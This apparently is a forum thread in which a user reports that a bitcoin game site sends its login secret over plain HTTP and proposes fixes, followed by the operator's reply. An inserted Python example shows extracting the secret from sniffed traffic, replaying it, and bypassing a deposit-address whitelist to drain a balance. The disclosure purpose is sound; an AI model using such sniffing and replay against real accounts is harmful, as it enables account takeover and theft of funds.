Hello,
I would like to report a possible security hole in the current scheme of things.
The idea to use only 'url with secret' for logging in is neat but not entirely safe because the web server uses plain http with no encryption.
Let's say you open the site for the first time and it gives you secret like
http://minefield.bitcoinlab.org/?secret=fngrOdO23tDOTuPW
Then you deposit some btc.
If someone is sniffing the traffic it is fairly easy to extract the GET /?secret=fngrOdO23tDOTuPW string from the HTTP request. Then he simply needs to open the site with that secret and he can withdraw the btc to an address of his choice.
I can mention two solutions.
1/ Get an https certificate and then run the website over ssl/tls. This will resolve the sniffing problem since all traffic would be encrypted.
2/ Make withdrawal possible only to addresses from which deposits were received. But on second thought this is not very secure either. A hacker could break into your account, deposit a minimal amount of btc and, after the deposit is confirmed (and the sending address accepted as viable for withdrawal), the hacker requests the whole amount to his address.
Best~
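The two points in the report above, as an added example that is not part of the original post or of the site's code: a regular expression that pulls the secret out of a captured plaintext HTTP request (the host name and secret value are the ones quoted in the report; the request headers are constructed), and a toy model of the deposit-address whitelist from option 2 that reproduces the dust-deposit bypass (the Account class, the "victim-addr"/"attacker-addr" labels and the satoshi amounts are assumptions made for this example).

```python
import re
from dataclasses import dataclass, field
from typing import Optional, Tuple

# Constructed sample of what a passive sniffer sees on the wire for a
# plain-HTTP login to the site named in the report. Host and secret are the
# values quoted in the report; the other headers are made up for this example.
CAPTURED_REQUEST = (
    b"GET /?secret=fngrOdO23tDOTuPW HTTP/1.1\r\n"
    b"Host: minefield.bitcoinlab.org\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Accept: text/html\r\n"
    b"\r\n"
)

# Matches the request line of a GET whose query string carries a secret=
# parameter, wherever it sits among other parameters.
SECRET_RE = re.compile(rb"^GET\s+/\?(?:[^ ]*&)?secret=([A-Za-z0-9_-]+)", re.M)


def extract_secret(payload: bytes) -> Optional[str]:
    """Pull the login secret out of a captured plaintext HTTP request.

    Over plain HTTP the request line travels unencrypted, so anyone on the
    path (or sharing the LAN) can read it with this same regex. Returns None
    when no secret-bearing request line is present, which is what a sniffer
    gets from a TLS session: the payload is ciphertext, not an HTTP request.
    """
    m = SECRET_RE.search(payload)
    return m.group(1).decode() if m else None


def replay_url(host: str, secret: str) -> str:
    """The attacker needs nothing beyond this URL to take over the account."""
    return "http://%s/?secret=%s" % (host, secret)


@dataclass
class Account:
    """Toy model (constructed) of option 2 from the report: an address becomes
    a valid withdrawal target once a deposit from it has been credited.
    Balances are integers in satoshi to avoid float rounding."""
    balance: int = 0
    deposit_addresses: set = field(default_factory=set)

    def deposit(self, from_addr: str, amount: int) -> None:
        self.balance += amount
        self.deposit_addresses.add(from_addr)

    def withdraw(self, to_addr: str, amount: int) -> bool:
        # Whitelist check: only addresses that have deposited may receive funds.
        if to_addr not in self.deposit_addresses or amount > self.balance:
            return False
        self.balance -= amount
        return True


def whitelist_bypass(victim_deposit: int, dust: int = 10_000) -> Tuple[int, int]:
    """Reproduce the weakness the report notes in option 2.

    An attacker holding the sniffed secret cannot withdraw to an address the
    account has never received from, so they first deposit a dust amount from
    their own address, which whitelists it, then withdraw the whole balance.
    Returns (attacker_received, victim_balance_left), both in satoshi.
    """
    acct = Account()
    acct.deposit("victim-addr", victim_deposit)   # the victim's real deposit
    # Whitelist holds as long as the attacker's address is unknown...
    if acct.withdraw("attacker-addr", acct.balance):
        raise RuntimeError("whitelist did not block an unknown address")
    # ...and fails as soon as one tiny deposit has been credited from it.
    acct.deposit("attacker-addr", dust)
    stolen = acct.balance
    acct.withdraw("attacker-addr", stolen)
    return stolen, acct.balance


if __name__ == "__main__":
    secret = extract_secret(CAPTURED_REQUEST)
    print("sniffed secret:", secret)
    print("replay URL:", replay_url("minefield.bitcoinlab.org", secret))
    print("attacker got / victim kept (sat):", whitelist_bypass(100_000_000))
```

Both halves rely on the same fact the report states: once the secret is the only credential, whoever can read the request line owns the account, and a deposit-address whitelist does not help because the attacker can satisfy it with a deposit of their own.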
Hey, yeah, I'm aware of this; I do know what https is and what it is for.

I don't think that this is very important, but I do plan to switch to https soon.
And on why I don't think it's important:
The number of local networks being sniffed by attackers interested in bitcoin is super small. People that know what https and sniffing are will make sure that they have a secure connection if they care to, and people that don't will probably get owned anyway. So I'm maybe saving one person in a few million, and this website didn't receive that many GET requests yet. And statistically, I'm saving them around 0.05 bitcoin...
But still, yes, https, soon.
PS
I may sound too dismissive, that's not the idea, thanks for reporting
